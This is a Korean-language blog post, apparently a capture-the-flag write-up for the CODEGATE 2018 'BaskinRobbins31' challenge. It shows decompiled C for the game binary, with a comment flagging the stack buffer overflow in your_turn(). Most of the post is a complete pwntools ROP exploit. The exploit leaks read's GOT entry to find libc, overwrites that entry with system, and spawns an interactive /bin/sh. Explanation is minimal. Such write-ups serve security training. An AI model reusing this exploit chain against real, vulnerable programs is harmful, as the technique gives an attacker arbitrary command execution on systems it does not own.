ii4gsp

[CODEGATE 2018] BaskinRobbins31 본문

시스템 해킹/CTF

[CODEGATE 2018] BaskinRobbins31

ii4gsp 2020. 2. 20. 13:29 
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  unsigned int v5; // [rsp+8h] [rbp-8h]
  _BOOL4 v6; // [rsp+Ch] [rbp-4h]

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  v3 = time(0LL);
  srand(v3);
  v5 = 31;
  v6 = 0;
  puts("### This game is similar to the BaskinRobins31 game. ###");
  puts("### The one that take the last match win ###");
  printf("There are %u number(s)\n", 31LL);
  while ( (signed int)v5 > 0 )
  {
    if ( v6 )
    {
      my_turn(&v5);
      v6 = 0;
    }
    else
    {
      v6 = (unsigned __int64)your_turn(&v5) != 0;
    }
    printf("remaining number(s) : %i \n", v5);
  }
  if ( v6 )
  {
    puts("Wow! You win!");
    puts("Hint is : ROP");
  }
  else
  {
    puts("You lose!");
  }
  return 0;
}

main()

 

 

 

 

int __fastcall my_turn(int *a1)
{
  int v1; // edx
  unsigned int v3; // [rsp+1Ch] [rbp-4h]

  if ( *a1 == 4 )
  {
    v3 = 4;
    *a1 = 0;
    puts("HUMMMMMMMMMMM");
    sleep(1u);
    puts("I got this!");
    sleep(1u);
    puts("HA! HA!");
    sleep(1u);
  }
  else
  {
    if ( *a1 & 3 )
    {
      v3 = *a1 % 4;
      v1 = *a1 - v3;
    }
    else
    {
      v3 = 1;
      v1 = *a1 - 1;
    }
    *a1 = v1;
  }
  return printf("I've taken %i number(s)\n", v3);
}

my_turn()

 

 

 

 

signed __int64 __fastcall your_turn(_DWORD *a1)
{
  signed __int64 result; // rax
  char s; // [rsp+10h] [rbp-B0h]
  size_t n; // [rsp+B0h] [rbp-10h]
  int v4; // [rsp+BCh] [rbp-4h]

  v4 = 0;
  memset(&s, 0, 0x96uLL);
  puts("How many numbers do you want to take ? (1-3)");
  n = read(0, &s, 0x190uLL); // BOF
  write(1, &s, n);
  putchar(10);
  v4 = strtoul(&s, 0LL, 10);
  if ( (unsigned int)check_decision(v4) )
  {
    *a1 -= v4;
    result = 1LL;
  }
  else
  {
    puts("Don't break the rules...:( ");
    result = 0LL;
  }
  return result;
}

your_turn()

 

 

 

 

from pwn import *

p = process('./BaskinRobins31')
e = ELF('./BaskinRobins31')
libc = e.libc

pppr = 0x000000000040087a
pop_rdi = 0x0000000000400bc3
binsh = '/bin/sh\x00'

payload = ''
payload += '\x90' * 184
payload += p64(pppr) + p64(1) + p64(e.got['read']) + p64(8) + p64(e.plt['write'])
payload += p64(pppr) + p64(0) + p64(e.bss()) + p64(len(binsh)) + p64(e.plt['read'])
payload += p64(pppr) + p64(0) + p64(e.got['read']) + p64(8) + p64(e.plt['read'])
payload += p64(pop_rdi) + p64(e.bss()) + p64(e.plt['read'])

p.recvuntil('(1-3)\n')
p.sendline(payload)

p.recvuntil(':( \n')

leak = u64(p.recv(6) + '\x00\x00')
libc_base = leak - libc.symbols['read']
system = libc_base + libc.symbols['system']
print hex(leak)

payload = ''
payload += binsh
payload += p64(system)

p.sendline(payload)

p.interactive()

exploit

 

 

 

 

'시스템 해킹 > CTF' 카테고리의 다른 글

CSAW CTF 2018 Quals - bigboy  (0) 2020.03.03
SSG_CTF - SimpleBOF  (0) 2020.02.25
[DEFCON 2015] r0pbaby  (0) 2020.02.20
[CODEGATE 2018] betting  (0) 2020.02.13
[DEFCON 2017 Quals] smashme  (0) 2020.02.13
'시스템 해킹/CTF' Related Articles more
Comments